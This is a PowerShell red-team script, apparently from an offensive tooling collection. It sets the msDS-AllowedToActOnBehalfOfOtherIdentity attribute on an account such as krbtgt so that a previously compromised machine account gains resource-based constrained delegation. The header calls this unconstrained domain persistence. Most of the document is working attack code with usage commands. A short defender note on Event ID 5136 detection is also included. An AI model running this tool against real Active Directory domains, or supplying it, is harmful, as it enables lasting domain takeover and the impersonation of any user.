Script for setting the "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, allowing incoming trust to the previously compromised Machine object, as described by Elad Shamir in his post: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
#
# Unconstrained Domain Persistence helper
#
# Usage:
#   PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
#   PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$
#
# Will allow the COMPROMISED$ machine account to perform S4U2 constrained delegation by means
# of the Resource-Based Constrained Delegation flavour of the attack.
#
# Script for setting the "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object,
# allowing incoming trust to the previously compromised Machine object, as described
# by Elad Shamir in his post: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
#
# This script requires PowerView to be loaded first.
#
# This is basically a rewritten script from Harmj0y's blog post here:
# https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
# all credit goes to the magnificent Harmj0y!
#
function Set-PrincipalAllowedToDelegateToAccount
{
    # Writes a security descriptor into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute
    # of $TargetUser that names $TargetComputer as a principal allowed to act on behalf of other
    # identities (resource-based constrained delegation configured on the resource side).
    # Requires PowerView (Get-DomainUser / Set-DomainObject) to be loaded in the session.
    #
    # NOTE(review): Set-DomainObject -Set presumably replaces the attribute value rather than
    # appending to it, so any delegation entries already present on the target are lost — confirm.
    #
    # Defender note: with Directory Service Changes auditing enabled on the DC, a write to this
    # attribute is recorded (Event ID 5136), so the attribute name is a useful detection filter;
    # periodically enumerating accounts that carry a non-empty value on sensitive objects such as
    # krbtgt surfaces this form of persistence.
    Param
    (
        # sAMAccountName of the account whose attribute is written (e.g. krbtgt).
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $TargetUser,

        # Machine account name (with trailing '$') that is granted the delegation right.
        [Parameter(Position = 1)]
        [ValidateNotNullOrEmpty()]
        [String]
        $TargetComputer
    )

    # Translate the identity to a security identifier. NTAccount.Translate fails if the name
    # cannot be resolved in the current domain context, so an unknown account aborts here.
    $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value

    # Substitute the security identifier into the raw SDDL: owner BA (Builtin Administrators),
    # DACL containing a single access-allowed ACE for the resolved SID.
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"

    # Get the binary bytes for the SDDL; the attribute is written as a binary security descriptor,
    # so the descriptor is serialized into a buffer of exactly BinaryLength bytes at offset 0.
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)

    # Set the new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' via PowerView;
    # -Verbose echoes the modification so the result can be checked in the console.
    Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
}